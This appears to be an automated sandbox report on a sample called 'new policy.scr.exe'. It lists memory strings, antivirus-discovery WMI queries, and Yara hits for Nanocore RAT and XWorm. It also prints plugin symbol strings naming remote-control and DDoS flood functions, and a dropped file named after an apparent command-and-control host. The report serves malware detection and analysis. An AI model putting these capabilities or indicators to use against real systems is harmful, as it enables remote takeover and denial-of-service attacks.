Source: new policy.scr.exe, 00000003.00000002.2835253359.000000000368F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q4Ck
Source: new policy.scr.exe, 00000003.00000002.2835253359.00000000036FA000.00000004.00000800.00020000.00000000.sdmp, new policy.scr.exe, 00000003.00000002.2835253359.000000000332F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q8
Source: new policy.scr.exe, 00000003.00000002.2835253359.00000000034AA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q</N
Source: new policy.scr.exe, 00000003.00000002.2835253359.00000000035C4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q\
Source: airlineagancy.casacam.net 7076.exe, 00000002.00000002.4094137301.000000000269E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 'PING!<Xwormmm>Program Manager<Xwormmm>0
Source: new policy.scr.exe, 00000003.00000002.2835253359.0000000003739000.00000004.00000800.00020000.00000000.sdmp, new policy.scr.exe, 00000003.00000002.2835253359.00000000037DD000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q`
Source: new policy.scr.exe, 00000003.00000002.2835253359.00000000036FA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qHq
Source: new policy.scr.exe, 00000003.00000002.2835253359.00000000037D9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qd
Source: new policy.scr.exe, 00000003.00000002.2835253359.0000000003536000.00000004.00000800.00020000.00000000.sdmp, new policy.scr.exe, 00000003.00000002.2835253359.0000000003516000.00000004.00000800.00020000.00000000.sdmp, new policy.scr.exe, 00000003.00000002.2835253359.000000000340A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q
Source: new policy.scr.exe, 00000003.00000002.2835253359.000000000368F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q,mk
Source: new policy.scr.exe, 00000003.00000002.2835253359.00000000037B9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q,#}
Source: new policy.scr.exe, 00000003.00000002.2879812341.0000000007ECC000.00000004.00000010.00020000.00000000.sdmp, new policy.scr.exe, 00000003.00000002.2879987019.000000000800C000.00000004.00000010.00020000.00000000.sdmp, new policy.scr.exe, 00000003.00000002.2832562480.000000000181E000.00000004.00000010.00020000.00000000.sdmp	Binary or memory string: Program ManagerManager
Source: new policy.scr.exe, 00000003.00000002.2835253359.00000000035E8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q,Me
Source: new policy.scr.exe, 00000003.00000002.2835253359.000000000332F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qP
Source: new policy.scr.exe, 00000003.00000002.2835253359.000000000368F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qhgo
Source: new policy.scr.exe, 00000003.00000002.2835253359.000000000332F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qT
Source: new policy.scr.exe, 00000003.00000002.2835253359.0000000003201000.00000004.00000800.00020000.00000000.sdmp, new policy.scr.exe, 00000003.00000002.2835253359.00000000036FA000.00000004.00000800.00020000.00000000.sdmp, new policy.scr.exe, 00000003.00000002.2835253359.0000000003739000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program Manager0~S
Source: new policy.scr.exe, 00000003.00000002.2835253359.000000000332F000.00000004.00000800.00020000.00000000.sdmp, new policy.scr.exe, 00000003.00000002.2835253359.00000000037B9000.00000004.00000800.00020000.00000000.sdmp, new policy.scr.exe, 00000003.00000002.2835253359.00000000037DD000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qX
Source: new policy.scr.exe, 00000003.00000002.2835253359.0000000003511000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qP'Q
Source: new policy.scr.exe, 00000003.00000002.2835253359.0000000003511000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q\|
Source: airlineagancy.casacam.net 7076.exe, 00000002.00000002.4094137301.000000000269E000.00000004.00000800.00020000.00000000.sdmp, new policy.scr.exe, 00000003.00000002.2835253359.0000000003536000.00000004.00000800.00020000.00000000.sdmp, new policy.scr.exe, 00000003.00000002.2835253359.0000000003516000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program Manager
Source: new policy.scr.exe, 00000003.00000002.2835253359.0000000003739000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qdXt
Source: new policy.scr.exe, 00000003.00000002.2835253359.0000000003536000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qHQU
Source: new policy.scr.exe, 00000003.00000002.2835253359.00000000035E8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qvd
Source: new policy.scr.exe, 00000003.00000002.2835253359.000000000368F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q4Zo
Source: new policy.scr.exe, 00000003.00000002.2835253359.0000000003201000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^ql
Source: new policy.scr.exe, 00000003.00000002.2835253359.00000000035E8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qTQd
Source: new policy.scr.exe, 00000003.00000002.2835253359.000000000332F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qp
Source: new policy.scr.exe, 00000003.00000002.2835253359.00000000035E8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^ql\a
Source: new policy.scr.exe, 00000003.00000002.2865122228.0000000006D8E000.00000004.00000010.00020000.00000000.sdmp	Binary or memory string: Program ManagerR
Source: new policy.scr.exe, 00000003.00000002.2835253359.00000000035E8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qtGe
Source: new policy.scr.exe, 00000003.00000002.2835253359.00000000035E8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qt
Source: new policy.scr.exe, 00000003.00000002.2835253359.000000000368F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qx
Source: new policy.scr.exe, 00000003.00000002.2835253359.000000000339E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q$':
Source: new policy.scr.exe, 00000003.00000002.2835253359.000000000368F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q,-u
Source: new policy.scr.exe, 00000003.00000002.2835253359.00000000037DD000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q
Source: new policy.scr.exe, 00000003.00000002.2835253359.0000000003739000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qLv{
Source: new policy.scr.exe, 00000003.00000002.2835253359.0000000003554000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qH1X
Source: new policy.scr.exe, 00000003.00000002.2835253359.000000000368F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q,-k
Source: new policy.scr.exe, 00000003.00000002.2835253359.0000000003536000.00000004.00000800.00020000.00000000.sdmp, new policy.scr.exe, 00000003.00000002.2835253359.000000000340A000.00000004.00000800.00020000.00000000.sdmp, new policy.scr.exe, 00000003.00000002.2835253359.0000000003201000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerlB^q
Source: airlineagancy.casacam.net 7076.exe, 00000002.00000002.4094137301.000000000269E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program Manager2
Source: new policy.scr.exe, 00000003.00000002.2835253359.00000000037B9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q(B\|
Source: new policy.scr.exe, 00000003.00000002.2835253359.0000000003566000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q("W
Source: new policy.scr.exe, 00000003.00000002.2835253359.00000000035E8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qT9`

Queries the volume information (name, serial number etc) of a device

Source: C:\Users\user\Desktop\new policy.scr.exe	Queries volume information: C:\Users\user\Desktop\new policy.scr.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\airlineagancy.casacam.net 7076.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\airlineagancy.casacam.net 7076.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe	Queries volume information: C:\Users\user\Desktop\new policy.scr.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Queries volume information: C:\Users\user\AppData\Roaming\Networks!.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Queries volume information: C:\Users\user\AppData\Roaming\Networks!.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Queries volume information: C:\Users\user\AppData\Roaming\Networks!.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Queries volume information: C:\Users\user\AppData\Roaming\Networks!.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation

Source: C:\Users\user\Desktop\new policy.scr.exe

Code function: 3_2_07758C68 GetSystemTimes,

3_2_07758C68

Source: C:\Users\user\Desktop\new policy.scr.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Source: C:\Users\user\AppData\Local\Temp\airlineagancy.casacam.net 7076.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\new policy.scr.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Users\user\Desktop\new policy.scr.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Users\user\Desktop\new policy.scr.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Users\user\Desktop\new policy.scr.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Users\user\Desktop\new policy.scr.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Users\user\Desktop\new policy.scr.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Users\user\Desktop\new policy.scr.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Users\user\Desktop\new policy.scr.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Users\user\Desktop\new policy.scr.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Users\user\Desktop\new policy.scr.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Users\user\Desktop\new policy.scr.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Users\user\Desktop\new policy.scr.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Users\user\Desktop\new policy.scr.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Users\user\Desktop\new policy.scr.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Users\user\Desktop\new policy.scr.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Users\user\Desktop\new policy.scr.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Users\user\Desktop\new policy.scr.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Users\user\Desktop\new policy.scr.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Users\user\Desktop\new policy.scr.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Users\user\Desktop\new policy.scr.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Users\user\Desktop\new policy.scr.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Users\user\Desktop\new policy.scr.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Users\user\Desktop\new policy.scr.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Users\user\Desktop\new policy.scr.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Users\user\Desktop\new policy.scr.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Users\user\Desktop\new policy.scr.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Users\user\Desktop\new policy.scr.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Users\user\Desktop\new policy.scr.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Users\user\Desktop\new policy.scr.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Users\user\Desktop\new policy.scr.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct

Stealing of Sensitive Information

Yara detected Nanocore RAT

Source: Yara match	File source: 3.2.new policy.scr.exe.59e4629.11.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.new policy.scr.exe.59e0000.12.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.Networks!.exe.37445bd.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.Networks!.exe.373b15e.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.new policy.scr.exe.42c7788.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.Networks!.exe.700000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.Networks!.exe.373ff94.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.Networks!.exe.275a4e8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.new policy.scr.exe.59e0000.12.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.Networks!.exe.60b5958.13.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.new policy.scr.exe.42c7788.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.Networks!.exe.373ff94.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.Networks!.exe.60b5958.13.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.new policy.scr.exe.3255830.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000006.00000002.2239294193.0000000006173000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1877031081.000000000428C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2239294193.000000000607A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2327789577.0000000005D23000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.2835253359.0000000003201000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.2858583023.00000000059E0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2274074926.00000000026F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2271006345.0000000000702000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2274766919.00000000036F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1877031081.000000000438C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: new policy.scr.exe PID: 7496, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: new policy.scr.exe PID: 7784, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Networks!.exe PID: 8108, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Networks!.exe PID: 7180, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Networks!.exe PID: 5868, type: MEMORYSTR

Yara detected XWorm

Source: Yara match	File source: 0.2.new policy.scr.exe.3252f80.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.0.airlineagancy.casacam.net 7076.exe.280000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.new policy.scr.exe.3252f80.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000000.1859765201.0000000000282000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1869683888.000000000322A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: new policy.scr.exe PID: 7496, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: airlineagancy.casacam.net 7076.exe PID: 7764, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\airlineagancy.casacam.net 7076.exe, type: DROPPED

Remote Access Functionality

Detected Nanocore Rat

Source: new policy.scr.exe, 00000000.00000002.1877031081.000000000428C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: new policy.scr.exe, 00000000.00000002.1877031081.000000000438C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: new policy.scr.exe, 00000003.00000002.2867271024.0000000007760000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: new policy.scr.exe, 00000003.00000002.2867271024.0000000007760000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCoreBase.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainNanoCoreBaseClientPluginCommandHandlerResourcesNanoCoreBase.My.ResourcesMySettingsMySettingsPropertyCommandsMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostIClientNetworkHostNetworkHostSendCommandparamsInitializePluginNanoCore.ClientPluginIClientNetwork_networkhost_loggingHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketHandleCommandHandleCommandOpenWebsiteHandleCommandMessageBoxSwapMouseButtonfSwapuser32.dllHandleCommandMouseSwapHandleCommandMouseUnswapmciSendStringlpszCommandlpszReturnStringcchReturnLengthhwndCallbackwinmm.dllmciSendStringAHandleCommandCDTrayHandleCommandCDTrayCloseSystem.ResourcesResourceManagerresourceManSystem.GlobalizationCultureInforesourceCultureget_ResourceManagerget_Cultureset_CultureValueCultureSystem.ConfigurationApplicationSettingsBasedefaultInstanceget_DefaultDefaultget_SettingsSettingsEnumvalue__OpenWebsiteMessageBoxCDTrayCDTrayCloseMouseSwapMouseUnswapSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeSendToServerParamArrayAttributeStringProcessStartSystem.Windows.FormsDialogResultShowConversionsReferenceEqualsSystem.ReflectionAssemblyget_AssemblyCompilerGeneratedAttributeSettingsBaseSynchronizedNanoCoreBase.Resources.resourcesDebuggableAttributeDebuggingModesCompilationRelaxationsAttributeRuntimeCompatibilityAttributeAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeNanoCoreBase.dll+set CDAudio door open/set CDAudio door closed-NanoCoreBase.Resources3
Source: new policy.scr.exe, 00000003.00000002.2852023359.00000000044EE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: new policy.scr.exe, 00000003.00000002.2852023359.00000000044EE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCoreStressTester.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainNanoCoreStressTesterClientPluginHTTPFloodSlowLorisSYNFloodTCPNanoCoreStressTester.FloodUDPSendSynCommandHandlerResourcesNanoCoreStressTester.My.ResourcesMySettingsMySettingsPropertyCommandsMethodsMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostIClientNetworkHostNetworkHostIClientDataHostDataHostClientGUIDSendCommandparamsInitializePluginNanoCore.ClientPluginIClientNetwork_networkhost_loggingHost_DataHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketStartHostToAttackArrayUploadDataSiteUserAgentRefererValuesGeneratecodelengthSystem.ThreadingThreadThreadsPortToAttackTimeToAttackThreadstoUseThreadsEndedattacksAttackRunningFloodnewHostnewPortnewTimenewThreadslolStopSlowlorisStressThreadStart_floodingJob_floodingThreadSystem.NetIPEndPoint_ipEo_synClassHostIsEnabledPortSuperSynSocketsStartSuperSynStopSuperSynSystem.Net.SocketsSocketClientIPPacketsPacketSizeMaxPacketsStopFloodmPacketspSize_sockipEosuperSynSockets__1IAsyncResultOnConnectarSendFloodingstopHTTPBytesSentSYNConnectionsHTTPDataSentMethodTargetAddressTargetStatusupdateBytesnewSYNFloodHandleDDOSCommandHandleStopCommandSystem.TimersElapsedEventArgsbytesTimerElapsedsourceeHandleHTTPCommandHandleSlowlorisCommandHandleTCPCommandHandleUDPCommandHandleSYNCommandSystem.ResourcesResourceManagerresourceManSystem.GlobalizationCultureInforesourceCultureget_ResourceManagerget_Cultureset_CultureValueCultureSystem.ConfigurationApplicationSettingsBasedefaultInstanceget_DefaultDefaultget_SettingsSettingsEnumvalue__sendStressCommandupdateStatusColumnstopStressCommandHTTPSlowlorisSYNSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeExceptionSendToServerProjectDataSetProjectErrorClearProjectErrorTimerNanoCoreIClientNameObjectCollectionget_VariablesGetValueset_Intervalset_EnabledElapsedEventHandleradd_ElapsedParamArrayAttributeRandomGuidStringIsNullOrEmptyArgumentNullExceptionArgumentOutOfRangeExce
Source: new policy.scr.exe, 00000003.00000002.2835253359.0000000003201000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
